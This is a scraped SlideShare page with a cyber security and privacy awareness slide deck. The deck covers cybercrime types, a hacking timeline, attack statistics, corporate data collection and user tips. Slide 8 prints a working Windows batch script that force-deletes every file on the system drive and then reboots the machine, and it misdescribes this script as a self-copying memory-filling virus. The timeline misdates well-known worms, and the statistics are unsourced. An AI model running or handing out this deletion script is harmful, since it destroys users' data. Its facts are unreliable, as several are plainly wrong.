SlideShare une entreprise Scribd logo
1  sur  13
Cyber security and user privacy
“I CAN DO MORE HARM TO YOU WITH A COMPUTER IN
MY HAND, SITTING AT HOME, THAN, HOLDING A GUN
POINTING AT YOU.”
-Jhunjhun Tripathy
Cyber Crime types:
• HACKING
• DENIAL OF SERVICE ATTACK
• VIRUS ATTACKS
• COMPUTER VANDALISM
• CYBER TERRORISM
• SOFTWARE PIRACY
How has Hacking Evolved? Present Scene
1977 – First virus
was written
1995- Breaking
Web Sites
2000- First
Malicious
Code: Melissa
2003-04-
Advanced worm “I
Love You” was
released.
2005-06- Identity
Theft (Phishing)
came to existence.
2007-08
Organised crime/
Data Theft on rise.
Present-
Encrypted
terrorist message
and cloud
Hacking.
How Have Things Emerged?
PAST PRESENT & FUTURE
• Cyber security is a young and
immature field
• The attackers are more innovative
than defenders
• Defenders are mired in FUD (fear,
uncertainty and doubt) and fairy
tales
• Attack back is illegal or classified
• Cyber security will become a
scientific discipline
• Cyber security will be application
and technology centric
• Cyber security will never be “solved”
but will be “managed”
• Attack back will be a integral part of
cyber security
Financial Fraud
3%
Data Sabotage
5%
Theft of Proprietory
Information
6%
System Penetration
8%
Denial Of Service
8%
Unauthorised Access
21%
Employee Abuse of Internet
Privilege
24%
Virus Attacks
25%
% Of Cyber Attack Types
Financial Fraud Data Sabotage Theft of Proprietory Information
System Penetration Denial Of Service Unauthorised Access
Employee Abuse of Internet Privilege Virus Attacks
What’s In their Mind???? The Plan?
• Knowing The Victim
• Planning
• Attack.
• Creation of backdoor for
Escaping.
• Go Incognito
UNDERSTAND
THE VICTIM
Plan
Attack
Cases Reported In India
State Cases
Maharashtra 907
UP 682
AP 657
0
50000
100000
150000
200000
250000
300000
2011 2012 2013 2014 2015
13301
22060
71780
149254
300000
Cyber Attack Cases
Cases
Estimated
Attacks this
year
How simple is it to Hack ?
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Can affect your system
drive C: . The virus can
copy endlessly until all
the cache memory is
utilised leaving no
memory for running any
application.
Hence, it shutdowns
the computer after a
delay.
Popular companies that collect user data..
• Facebook
• Google
• Apple
• Microsoft
• Samsung
• Sony
• Xiaomi
How Google Violates Privacy?
• Street View: Not just street mapping.
• Gmail: Prying and spying.
• Google Chrome: Not just hunting Wi-Fi. It knows all about
you.
• Android: Another data gateway. Now they know where,
whom and How you are.
Why is this Information Collected?
• Ads
• Services
• Backdoor
• Inline Marketing
• Push mail regarding services
• Cloud synchronisation
0
5
10
15
20
25
30
35
40
45
Ads Services Backdoor Inline
Marketing
Push mail Cloud Sync
Purpose
Percent
What Should you Do now?
• Use Linux and Unix based Operating systems.
• Use proxy server to avoid location based tracking.
• Carefully read the permissions that ask for accessing microphone and camera.
• Use a dynamic IP address.
• Don't store credit card information within apps or cloud servers like Google
Drive.
• Use secure browsers. Ex: Comodo Dragon
• Use secured encrypted email clients like Clyton or Thunderbird.
HAPPY BROWSING


Contenu connexe

Tendances

Tendances (20)

Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security Awareness
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber Security For Kids by Shounak Ray Chaudhuri
Cyber Security For Kids by Shounak Ray Chaudhuri Cyber Security For Kids by Shounak Ray Chaudhuri
Cyber Security For Kids by Shounak Ray Chaudhuri
 
Computer Project on Cyber Safety
Computer Project on Cyber SafetyComputer Project on Cyber Safety
Computer Project on Cyber Safety
 
Cyber security snowe vazeer
Cyber security snowe vazeerCyber security snowe vazeer
Cyber security snowe vazeer
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber security certification course
Cyber security certification courseCyber security certification course
Cyber security certification course
 
Krishna cyber safety
Krishna cyber safetyKrishna cyber safety
Krishna cyber safety
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
 
Online safety
Online safety Online safety
Online safety
 
Computer & internet Security
Computer & internet SecurityComputer & internet Security
Computer & internet Security
 
Internet Threats
Internet ThreatsInternet Threats
Internet Threats
 
Cybersecurity for the non-technical
Cybersecurity for the non-technicalCybersecurity for the non-technical
Cybersecurity for the non-technical
 
CyberSecurity
CyberSecurityCyberSecurity
CyberSecurity
 
Cyber security
Cyber securityCyber security
Cyber security
 
User's Guide to Online Privacy
User's Guide to Online PrivacyUser's Guide to Online Privacy
User's Guide to Online Privacy
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
 
Cybersecurity 140713064844-phpapp01 (1)-converted
Cybersecurity 140713064844-phpapp01 (1)-convertedCybersecurity 140713064844-phpapp01 (1)-converted
Cybersecurity 140713064844-phpapp01 (1)-converted
 
Social Networking Security
Social Networking SecuritySocial Networking Security
Social Networking Security
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 

En vedette

Cyber security and privacy
Cyber security and privacyCyber security and privacy
Cyber security and privacyJIJO CLEETUS
 
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your RiskHow to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your RiskSurfWatch Labs
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementMayur Nanotkar
 
Cybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecurityCybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecuritysommerville-videos
 
TEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkTEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkVolker Hirsch
 

En vedette (6)

Cyber security and privacy
Cyber security and privacyCyber security and privacy
Cyber security and privacy
 
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your RiskHow to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 
Cybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecurityCybersecurity 1. intro to cybersecurity
Cybersecurity 1. intro to cybersecurity
 
Types of cyber attacks
Types of cyber attacksTypes of cyber attacks
Types of cyber attacks
 
TEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of WorkTEDx Manchester: AI & The Future of Work
TEDx Manchester: AI & The Future of Work
 

Similaire à Cyber security and user privacy

csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBCapyn
 
CYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYCYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYChaya Sorir
 
Cyber Security in Society
Cyber Security in SocietyCyber Security in Society
Cyber Security in SocietyRubal Sagwal
 
Cybercrime trends in last five years
Cybercrime trends in last five yearsCybercrime trends in last five years
Cybercrime trends in last five yearsSABBY GILL
 
Is6120 data security presentation
Is6120 data security presentationIs6120 data security presentation
Is6120 data security presentationJamesDempsey1
 
CYBER CRIME AND SECURITY MAYUR.pptx
CYBER CRIME AND SECURITY MAYUR.pptxCYBER CRIME AND SECURITY MAYUR.pptx
CYBER CRIME AND SECURITY MAYUR.pptxMayurSapkale7
 
Cybercrime and its effects on personal life who uses internet
Cybercrime and its effects on personal life who uses internet Cybercrime and its effects on personal life who uses internet
Cybercrime and its effects on personal life who uses internet vimal kumar arora
 
43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx
43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx
43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptxPradeeshSAI
 
Rishabhcyber security.pptx
Rishabhcyber security.pptxRishabhcyber security.pptx
Rishabhcyber security.pptxRishabhDwivedi70
 
Cysec.pptx
Cysec.pptxCysec.pptx
Cysec.pptxjondon17
 
Cyber crime ands security.ppt
Cyber crime ands security.pptCyber crime ands security.ppt
Cyber crime ands security.pptArshad Khan
 

Similaire à Cyber security and user privacy (20)

csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBC
 
CYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYCYBER CRIME AND SECURITY
CYBER CRIME AND SECURITY
 
Cyber Security in Society
Cyber Security in SocietyCyber Security in Society
Cyber Security in Society
 
Cybercrime trends in last five years
Cybercrime trends in last five yearsCybercrime trends in last five years
Cybercrime trends in last five years
 
Is6120 data security presentation
Is6120 data security presentationIs6120 data security presentation
Is6120 data security presentation
 
Cyber security
Cyber securityCyber security
Cyber security
 
CYBER CRIME AND SECURITY MAYUR.pptx
CYBER CRIME AND SECURITY MAYUR.pptxCYBER CRIME AND SECURITY MAYUR.pptx
CYBER CRIME AND SECURITY MAYUR.pptx
 
Cybercrime and its effects on personal life who uses internet
Cybercrime and its effects on personal life who uses internet Cybercrime and its effects on personal life who uses internet
Cybercrime and its effects on personal life who uses internet
 
Cyber Security PPT.pptx
Cyber Security PPT.pptxCyber Security PPT.pptx
Cyber Security PPT.pptx
 
Cybercrimes
CybercrimesCybercrimes
Cybercrimes
 
43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx
43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx
43080d37-44e9-4b2f-9cb5-ceb90f3fab98.pptx
 
Cyber Security.pptx
Cyber Security.pptxCyber Security.pptx
Cyber Security.pptx
 
Rishabhcyber security.pptx
Rishabhcyber security.pptxRishabhcyber security.pptx
Rishabhcyber security.pptx
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber crime and security
Cyber crime and securityCyber crime and security
Cyber crime and security
 
Cysec.pptx
Cysec.pptxCysec.pptx
Cysec.pptx
 
CYBER CRIME
CYBER CRIME CYBER CRIME
CYBER CRIME
 
Cyber Crime.pptx
Cyber Crime.pptxCyber Crime.pptx
Cyber Crime.pptx
 
Cyber crime ands security.ppt
Cyber crime ands security.pptCyber crime ands security.ppt
Cyber crime ands security.ppt
 
Cyber Security PPT.pptx
Cyber Security PPT.pptxCyber Security PPT.pptx
Cyber Security PPT.pptx
 

Cyber security and user privacy

  • 1. Cyber security and user privacy “I CAN DO MORE HARM TO YOU WITH A COMPUTER IN MY HAND, SITTING AT HOME, THAN, HOLDING A GUN POINTING AT YOU.” -Jhunjhun Tripathy
  • 2. Cyber Crime types: • HACKING • DENIAL OF SERVICE ATTACK • VIRUS ATTACKS • COMPUTER VANDALISM • CYBER TERRORISM • SOFTWARE PIRACY
  • 3. How has Hacking Evolved? Present Scene 1977 – First virus was written 1995- Breaking Web Sites 2000- First Malicious Code: Melissa 2003-04- Advanced worm “I Love You” was released. 2005-06- Identity Theft (Phishing) came to existence. 2007-08 Organised crime/ Data Theft on rise. Present- Encrypted terrorist message and cloud Hacking.
  • 4. How Have Things Emerged? PAST PRESENT & FUTURE • Cyber security is a young and immature field • The attackers are more innovative than defenders • Defenders are mired in FUD (fear, uncertainty and doubt) and fairy tales • Attack back is illegal or classified • Cyber security will become a scientific discipline • Cyber security will be application and technology centric • Cyber security will never be “solved” but will be “managed” • Attack back will be a integral part of cyber security
  • 5. Financial Fraud 3% Data Sabotage 5% Theft of Proprietory Information 6% System Penetration 8% Denial Of Service 8% Unauthorised Access 21% Employee Abuse of Internet Privilege 24% Virus Attacks 25% % Of Cyber Attack Types Financial Fraud Data Sabotage Theft of Proprietory Information System Penetration Denial Of Service Unauthorised Access Employee Abuse of Internet Privilege Virus Attacks
  • 6. What’s In their Mind???? The Plan? • Knowing The Victim • Planning • Attack. • Creation of backdoor for Escaping. • Go Incognito UNDERSTAND THE VICTIM Plan Attack
  • 7. Cases Reported In India State Cases Maharashtra 907 UP 682 AP 657 0 50000 100000 150000 200000 250000 300000 2011 2012 2013 2014 2015 13301 22060 71780 149254 300000 Cyber Attack Cases Cases Estimated Attacks this year
  • 8. How simple is it to Hack ? @echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00 Can affect your system drive C: . The virus can copy endlessly until all the cache memory is utilised leaving no memory for running any application. Hence, it shutdowns the computer after a delay.
  • 9. Popular companies that collect user data.. • Facebook • Google • Apple • Microsoft • Samsung • Sony • Xiaomi
  • 10. How Google Violates Privacy? • Street View: Not just street mapping. • Gmail: Prying and spying. • Google Chrome: Not just hunting Wi-Fi. It knows all about you. • Android: Another data gateway. Now they know where, whom and How you are.
  • 11. Why is this Information Collected? • Ads • Services • Backdoor • Inline Marketing • Push mail regarding services • Cloud synchronisation 0 5 10 15 20 25 30 35 40 45 Ads Services Backdoor Inline Marketing Push mail Cloud Sync Purpose Percent
  • 12. What Should you Do now? • Use Linux and Unix based Operating systems. • Use proxy server to avoid location based tracking. • Carefully read the permissions that ask for accessing microphone and camera. • Use a dynamic IP address. • Don't store credit card information within apps or cloud servers like Google Drive. • Use secure browsers. Ex: Comodo Dragon • Use secured encrypted email clients like Clyton or Thunderbird.